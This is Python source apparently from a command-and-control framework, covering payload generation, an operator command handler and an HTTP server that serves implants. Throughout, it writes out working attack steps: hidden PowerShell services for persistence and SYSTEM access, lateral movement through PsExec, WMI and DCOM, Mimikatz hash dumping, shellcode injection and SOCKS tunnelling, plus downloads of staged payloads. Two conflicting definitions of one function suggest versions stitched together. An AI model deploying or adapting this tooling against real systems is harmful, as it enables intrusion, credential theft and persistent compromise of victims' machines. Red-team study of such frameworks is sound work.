def createnewpayload(user, startup): domain = input("Domain or URL: https://www.example.com ") domainbase = (domain.lower()).replace('https://', '') domainbase = domainbase.replace('http://', '') domainfront = input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ") proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ") randomid = randomuri(5) proxyuser = "" proxypass = "" credsexpire = "" if proxyurl: proxyuser = input("Proxy User: e.g. Domain\\user ") proxypass = input("Proxy Password: e.g. Password1 ") credsexpire = input( "Password/Account Expiration Date: .e.g. 15/03/2018 ") imurl = "%s?p" % get_newimplanturl() domainbase = "Proxy%s%s" % (domainbase, randomid) else: domainbase = "%s%s" % (randomid, domainbase) imurl = get_newimplanturl() C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser, proxypass, proxyurl, "", "", C2[19], C2[20], C2[21], imurl, PayloadsDirectory) newPayload.CreateRaw("%s_" % domainbase) newPayload.CreateDlls("%s_" % domainbase) newPayload.CreateShellcode("%s_" % domainbase) newPayload.CreateEXE("%s_" % domainbase) newPayload.CreateMsbuild("%s_" % domainbase) newPayload.CreatePython("%s_" % domainbase) new_urldetails(randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire) startup(user, "Created new payloads")
def createdaisypayload(user, startup): name = input("Daisy name: e.g. DC1 ") domain = input("Domain or URL: https://www.example.com ") daisyurl = input("Daisy host: .e.g. http://10.150.10.1 ") if (daisyurl == "http://127.0.0.1"): daisyurl = "http://localhost" if (daisyurl == "https://127.0.0.1"): daisyurl = "https://localhost" daisyport = input("Daisy port: .e.g. 8888 ") daisyhostid = input("Select Daisy Implant Host: e.g. 5 ") daisyhost = get_implantbyid(daisyhostid) proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "", "", proxynone, C2[19], C2[20], C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory) newPayload.PSDropper = (newPayload.PSDropper).replace( "$pid;%s" % (daisyurl + ":" + daisyport), "$pid;%s@%s" % (daisyhost[11], daisyhost[3])) newPayload.CreateRaw(name) newPayload.CreateDlls(name) newPayload.CreateShellcode(name) newPayload.CreateEXE(name) newPayload.CreateMsbuild(name) new_urldetails(name, C2[1], C2[3], domain, daisyurl, daisyhostid, "") startup(user, "Created new %s daisy payloads" % name)
def createproxypayload(user, startup, creds=None): if creds is not None: proxyuser = "******" % (creds['Domain'], creds['Username']) proxypass = creds['Password'] else: proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ") proxypass = input("Proxy Password: e.g. Password1 ") proxyurl = input(Colours.GREEN + "Proxy URL: .e.g. http://10.150.10.1:8080 ") credsexpire = input("Password/Account Expiration Date: .e.g. 15/03/2018 ") update_item("ProxyURL", "C2Server", proxyurl) update_item("ProxyUser", "C2Server", proxyuser) update_item("ProxyPass", "C2Server", proxypass) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) newPayload.CreateRaw("Proxy") newPayload.CreateDlls("Proxy") newPayload.CreateShellcode("Proxy") newPayload.CreateEXE("Proxy") newPayload.CreateMsbuild("Proxy") newPayload.CreateCS("Proxy") new_urldetails("Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire) startup(user, "Created new proxy payloads")
def createproxypayload(user, startup): proxyuser = raw_input("Proxy User: e.g. Domain\\user ") proxypass = raw_input("Proxy Password: e.g. Password1 ") proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ") credsexpire = raw_input("Password/Account Expiration Date: .e.g. 15/03/2018 ") update_item("ProxyURL", "C2Server", proxyurl) update_item("ProxyUser", "C2Server", proxyuser) update_item("ProxyPass", "C2Server", proxypass) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) newPayload.CreateRaw("Proxy") newPayload.CreateDlls("Proxy") newPayload.CreateShellcode("Proxy") newPayload.CreateEXE("Proxy") newPayload.CreateMsbuild("Proxy") new_urldetails("Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire) startup(user, "Created new proxy payloads")
def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload): try: check_module_loaded("Stage2-Core.ps1", randomuri, user) except Exception as e: print("Error loading Stage2-Core.ps1: %s" % e) # alias mapping for alias in ps_alias: if command.startswith(alias[0]): command.replace(alias[0], alias[1]) command = command.strip() run_autoloads(command, randomuri, user) # opsec failures for opsec in ps_opsec: if opsec == command[:len(opsec)]: print(Colours.RED) print("**OPSEC Warning**") impid = get_implantdetails(randomuri) ri = input("Do you want to continue running - %s? (y/N) " % command) if ri.lower() == "n": command = "" if ri == "": command = "" break if command.startswith("beacon") or command.startswith("set-beacon") or command.startswith("setbeacon"): new_sleep = command.replace('set-beacon ', '') new_sleep = new_sleep.replace('setbeacon ', '') new_sleep = new_sleep.replace('beacon ', '').strip() if not validate_sleep_time(new_sleep): print(Colours.RED) print("Invalid sleep command, please specify a time such as 50s, 10m or 1h") print(Colours.GREEN) else: new_task(command, user, randomuri) update_sleep(new_sleep, randomuri) elif (command.startswith('label-implant')): label = command.replace('label-implant ', '') update_label(label, randomuri) startup(user) elif command.startswith("searchhelp"): searchterm = (command).replace("searchhelp ", "") helpful = posh_help.split('\n') for line in helpful: if searchterm in line.lower(): print(line) elif (command == "back") or (command == "clear"): startup(user) elif command.startswith("install-servicelevel-persistencewithproxy"): C2 = get_c2server_all() if C2[11] == "": startup(user, "Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload) new_task(cmd, user, randomuri) elif command.startswith("install-servicelevel-persistence"): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload) new_task(cmd, user, randomuri) elif command.startswith("remove-servicelevel-persistence"): new_task("sc.exe delete CPUpdater", user, randomuri) # psexec lateral movement elif command.startswith("get-implantworkingdirectory"): new_task("pwd", user, randomuri) elif command.startswith("get-system-withproxy"): C2 = get_c2server_all() if C2[11] == "": startup(user, "Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" new_task(cmd, user, randomuri) elif command.startswith("get-system-withdaisy"): C2 = get_c2server_all() daisyname = input("Payload name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p: payload = p.read() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" new_task(cmd, user, randomuri) elif command.startswith("get-system"): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" new_task(cmd, user, randomuri) elif command == "quit": ri = input("Are you sure you want to quit? (Y/n) ") if ri.lower() == "n": startup(user) if ri == "": sys.exit(0) if ri.lower() == "y": sys.exit(0) elif command.startswith("invoke-psexecproxypayload"): check_module_loaded("Invoke-PsExec.ps1", randomuri, user) if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, "Proxy"))): with open("%s%spayload.bat" % (PayloadsDirectory, "Proxy"), "r") as p: payload = p.read() params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-psexec %s -command \"%s\"" % (params, payload) new_task(cmd, user, randomuri) else: startup(user, "Need to run createproxypayload first") elif command.startswith("invoke-psexecdaisypayload"): check_module_loaded("Invoke-PsExec.ps1", randomuri, user) daisyname = input("Payload name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p: payload = p.read() params = re.compile("invoke-psexecdaisypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-psexec %s -command \"%s\"" % (params, payload) new_task(cmd, user, randomuri) else: startup(user, "Need to run createdaisypayload first") elif command.startswith("invoke-psexecpayload"): check_module_loaded("Invoke-PsExec.ps1", randomuri, user) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() params = re.compile("invoke-psexecpayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params, payload) new_task(cmd, user, randomuri) # wmi lateral movement elif command.startswith("invoke-wmiproxypayload"): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, "Proxy"))): with open("%s%spayload.bat" % (PayloadsDirectory, "Proxy"), "r") as p: payload = p.read() params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-wmiexec %s -command \"%s\"" % (params, payload) new_task(cmd, user, randomuri) else: startup(user, "Need to run createproxypayload first") elif command.startswith("invoke-wmidaisypayload"): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) daisyname = input("Name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p: payload = p.read() params = re.compile("invoke-wmidaisypayload ", re.IGNORECASE) params = params.sub("", command) cmd = "invoke-wmiexec %s -command \"%s\"" % (params, payload) new_task(cmd, user, randomuri) else: startup(user, "Need to run createdaisypayload first") elif command.startswith("invoke-wmipayload"): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() params = re.compile("invoke-wmipayload ", re.IGNORECASE) params = params.sub("", command) if "-credid" in command: p = re.compile(r"-credid (\w*)") credId = re.search(p, command) if credId: credId = credId.group(1) else: startup(user, "Please specify a credid") creds = get_cred_by_id(credId) if creds is None: startup(user, "Unrecognised CredID: %s" % credId) params = params.replace("-credid %s" % credId, "") if creds['Password']: params = params + "-domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password']) else: params = params + "-domain %s -user %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash']) cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params, payload) new_task(cmd, user, randomuri) # dcom lateral movement elif command.startswith("invoke-dcomproxypayload"): if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, "Proxy"))): with open("%s%spayload.bat" % (PayloadsDirectory, "Proxy"), "r") as p: payload = p.read() params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE) params = params.sub("", command) p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c %s\",\"7\")" % (target, payload) new_task(pscommand, user, randomuri) else: startup(user, "Need to run createproxypayload first") elif command.startswith("invoke-dcomdaisypayload"): daisyname = input("Name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p: payload = p.read() p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target, payload) new_task(pscommand, user, randomuri) else: startup(user, "Need to run createdaisypayload first") elif command.startswith("invoke-dcompayload"): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target, payload) new_task(pscommand, user, randomuri) # runas payloads elif command.startswith("invoke-runasdaisypayload"): daisyname = input("Name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p: payload = p.read() new_task("$proxypayload = \"%s\"" % payload, user, randomuri) check_module_loaded("Invoke-RunAs.ps1", randomuri, user) check_module_loaded("NamedPipeDaisy.ps1", randomuri, user) params = re.compile("invoke-runasdaisypayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSDaisy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8")) new_task(pscommand, user, randomuri) else: startup(user, "Need to run createdaisypayload first") elif command.startswith("invoke-runasproxypayload"): C2 = get_c2server_all() if C2[11] == "": startup(user, "Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload new_task(proxyvar, user, randomuri) check_module_loaded("Invoke-RunAs.ps1", randomuri, user) check_module_loaded("NamedPipeProxy.ps1", randomuri, user) params = re.compile("invoke-runasproxypayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8")) new_task(pscommand, user, randomuri) elif command.startswith("invoke-runaspayload"): check_module_loaded("Invoke-RunAs.ps1", randomuri, user) check_module_loaded("NamedPipe.ps1", randomuri, user) params = re.compile("invoke-runaspayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8")) new_task(pscommand, user, randomuri) elif command == "help" or command == "?": print(posh_help) elif command == "help 1": print(posh_help1) elif command == "help 2": print(posh_help2) elif command == "help 3": print(posh_help3) elif command == "help 4": print(posh_help4) elif command == "help 5": print(posh_help5) elif command == "help 6": print(posh_help6) elif command == "help 7": print(posh_help7) elif command == "help 8": print(posh_help8) elif command.startswith("get-pid"): pid = get_implantdetails(randomuri) print(pid[8]) elif command.startswith("upload-file"): source = "" destination = "" s = "" nothidden = False if command == "upload-file": source = readfile_with_completion("Location of file to upload: ") while not os.path.isfile(source): print("File does not exist: %s" % source) source = readfile_with_completion("Location of file to upload: ") destination = input("Location to upload to: ") else: args = argp(command) source = args.source destination = args.destination nothidden = args.nothidden try: with open(source, "rb") as source_file: s = source_file.read() if s: sourceb64 = base64.b64encode(s).decode("utf-8") destination = destination.replace("\\", "\\\\") print("") print("Uploading %s to %s" % (source, destination)) if (nothidden): uploadcommand = "Upload-File -Destination \"%s\" -NotHidden %s -Base64 %s" % (destination, nothidden, sourceb64) else: uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, sourceb64) new_task(uploadcommand, user, randomuri) else: print("Source file could not be read or was empty") except Exception as e: print("Error with source file: %s" % e) traceback.print_exc() elif command == "kill-implant" or command == "exit": impid = get_implantdetails(randomuri) ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0]) if ri.lower() == "n": print("Implant not terminated") if ri == "": new_task("exit", user, randomuri) kill_implant(randomuri) if ri.lower() == "y": new_task("exit", user, randomuri) kill_implant(randomuri) elif command.startswith("unhide-implant"): unhide_implant(randomuri) elif command.startswith("hide-implant"): kill_implant(randomuri) elif command.startswith("migrate"): params = re.compile("migrate", re.IGNORECASE) params = params.sub("", command) migrate(randomuri, user, params) elif command.startswith("loadmoduleforce"): params = re.compile("loadmoduleforce ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, user, force=True) elif command.startswith("loadmodule"): params = re.compile("loadmodule ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, user) elif command.startswith("invoke-daisychain"): check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user) urls = get_allurls() new_task("%s -URLs '%s'" % (command, urls), user, randomuri) print("Now use createdaisypayload") elif command.startswith("inject-shellcode"): params = re.compile("inject-shellcode", re.IGNORECASE) params = params.sub("", command) check_module_loaded("Inject-Shellcode.ps1", randomuri, user) readline.set_completer(shellcodefilecomplete) path = input("Location of shellcode file: ") t = tabCompleter() t.createListCompleter(COMMANDS) readline.set_completer(t.listCompleter) try: shellcodefile = load_file(path) if shellcodefile is not None: arch = "64" new_task("$Shellcode%s=\"%s\" #%s" % (arch, base64.b64encode(shellcodefile).decode("utf-8"), os.path.basename(path)), user, randomuri) new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri) except Exception as e: print("Error loading file: %s" % e) elif command == "listmodules": print(os.listdir("%s/Modules/" % POSHDIR)) elif command == "modulesloaded": ml = get_implantdetails(randomuri) print(ml[14]) elif command == "ps": new_task("get-processlist", user, randomuri) elif command == "hashdump": check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user) new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri) elif command == "stopdaisy": update_label("", randomuri) new_task(command, user, randomuri) elif command == "stopsocks": update_label("", randomuri) new_task(command, user, randomuri) elif command == "sharpsocks": check_module_loaded("SharpSocks.ps1", randomuri, user) import string from random import choice allchar = string.ascii_letters channel = "".join(choice(allchar) for x in range(25)) sharpkey = gen_key().decode("utf-8") sharpurls = get_sharpurls() sharpurl = select_item("HostnameIP", "C2Server") sharpport = select_item("ServerPort", "C2Server") implant = get_implantdetails(randomuri) pivot = implant[15] if pivot != "PS": sharpurl = input("Enter the URL for SharpSocks: ") if (sharpport != 80 and sharpport != 443): if (sharpurl.count("/") >= 3): pat = re.compile(r"(?<!/)/(?!/)") sharpurl = pat.sub(":%s/" % sharpport, str, 1) else: sharpurl = ("%s:%s" % (sharpurl, sharpport)) print(POSHDIR + "SharpSocks/SharpSocksServerCore -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN) ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ") if ri.lower() == "n": print("") if ri == "": new_task("Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (sharpurl, channel, sharpkey, sharpurls), user, randomuri) if ri.lower() == "y": new_task("Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (sharpurl, channel, sharpkey, sharpurls), user, randomuri) update_label("SharpSocks", randomuri) elif command == "history": startup(user, get_history()) elif command.startswith("reversedns"): params = re.compile("reversedns ", re.IGNORECASE) params = params.sub("", command) new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri) elif command.startswith("createdaisypayload"): createdaisypayload(user, startup) elif command.startswith("createproxypayload"): createproxypayload(user, startup) elif command.startswith("createnewpayload"): createproxypayload(user, startup) else: if command: new_task(command, user, randomuri) return
def do_GET(s): """Respond to a GET request.""" logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(s.path), str(s.headers)) new_implant_url = get_newimplanturl() s.cookieHeader = s.headers.get('Cookie') QuickCommandURI = select_item("QuickCommand", "C2Server") UriPath = str(s.path) sharpurls = get_sharpurls().split(",") sharplist = [] for i in sharpurls: i = i.replace(" ", "") i = i.replace("\"", "") sharplist.append("/" + i) s.server_version = ServerHeader s.sys_version = "" if not s.cookieHeader: s.cookieHeader = "NONE" # implant gets a new task new_task = newTask(s.path) if new_task: s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(new_task) elif any(UriPath in s for s in sharplist): try: open("%swebserver.log" % ROOTDIR, "a").write( "%s - [%s] Making GET connection to SharpSocks %s%s\r\n" % (s.address_string(), s.log_date_time_string(), SocksHost, UriPath)) r = Request( "%s%s" % (SocksHost, UriPath), headers={ 'Accept-Encoding': 'gzip', 'Cookie': '%s' % s.cookieHeader, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36' }) res = urlopen(r) sharpout = res.read() s.send_response(200) s.send_header("Content-type", "text/html") s.send_header("Connection", "close") s.send_header("Content-Length", len(sharpout)) s.end_headers() if (len(sharpout) > 0): s.wfile.write(sharpout) except HTTPError as e: s.send_response(e.code) s.send_header("Content-type", "text/html") s.send_header("Connection", "close") s.end_headers() open("%swebserver.log" % ROOTDIR, "a").write( "[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc())) open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e) except Exception as e: open("%swebserver.log" % ROOTDIR, "a").write( "[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc())) open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e) print( Colours.RED + "Error with SharpSocks connection - is SharpSocks running" + Colours.END) elif ("%s_bs" % QuickCommandURI) in s.path: filename = "%spayload.bat" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%s_rg" % QuickCommandURI) in s.path: filename = "%srg_sct.xml" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%ss/86/portal" % QuickCommandURI) in s.path: filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%ss/64/portal" % QuickCommandURI) in s.path: filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%sp/86/portal" % QuickCommandURI) in s.path: filename = "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%sp/64/portal" % QuickCommandURI) in s.path: filename = "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%s_cs" % QuickCommandURI) in s.path: filename = "%scs_sct.xml" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%s_py" % QuickCommandURI) in s.path: filename = "%saes.py" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = "a" + "".join("{:02x}".format(c) for c in content) s.send_response(200) s.send_header("Content-type", "text/plain") s.end_headers() s.wfile.write(bytes(content, "utf-8")) elif ("%s_ex86" % QuickCommandURI) in s.path: filename = "%sPosh32.exe" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() s.send_response(200) s.send_header("Content-type", "application/x-msdownload") s.end_headers() s.wfile.write(content) elif ("%s_ex64" % QuickCommandURI) in s.path: filename = "%sPosh64.exe" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() s.send_response(200) s.send_header("Content-type", "application/x-msdownload") s.end_headers() s.wfile.write(content) # register new implant elif new_implant_url in s.path and s.cookieHeader.startswith( "SessionID"): implant_type = "PS" if s.path == ("%s?p" % new_implant_url): implant_type = "PS Proxy" if s.path == ("%s?d" % new_implant_url): implant_type = "PS Daisy" if s.path == ("%s?m" % new_implant_url): implant_type = "Python" if s.path == ("%s?d?m" % new_implant_url): implant_type = "Python Daisy" if s.path == ("%s?p?m" % new_implant_url): implant_type = "Python Proxy" if s.path == ("%s?c" % new_implant_url): implant_type = "C#" if s.path == ("%s?d?c" % new_implant_url): implant_type = "C# Daisy" if s.path == ("%s?p?c" % new_implant_url): implant_type = "C# Proxy" if implant_type.startswith("C#"): cookieVal = (s.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1]) Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";") if "\\" in User: User = User[User.index("\\") + 1:] newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy) newImplant.save() newImplant.display() responseVal = encrypt(KEY, newImplant.SharpCore) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(responseVal) elif implant_type.startswith("Python"): cookieVal = (s.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1]) User, Domain, Hostname, Arch, PID, Proxy = decCookie.split(";") newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy) newImplant.save() newImplant.display() responseVal = encrypt(KEY, newImplant.PythonCore) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(responseVal) else: try: cookieVal = (s.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY.encode("utf-8"), cookieVal) decCookie = str(decCookie) Domain, User, Hostname, Arch, PID, Proxy = decCookie.split( ";") IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1]) if "\\" in str(User): User = User[str(User).index('\\') + 1:] newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy) newImplant.save() newImplant.display() newImplant.autoruns() responseVal = encrypt(KEY, newImplant.PSCore) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(responseVal) except Exception as e: print("Decryption error: %s" % e) traceback.print_exc() s.send_response(404) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(bytes(HTTPResponse, "utf-8")) else: s.send_response(404) s.send_header("Content-type", "text/html") s.end_headers() HTTPResponsePage = select_item("HTTPResponse", "C2Server") if HTTPResponsePage: s.wfile.write(bytes(HTTPResponsePage, "utf-8")) else: s.wfile.write(bytes(HTTPResponse, "utf-8"))
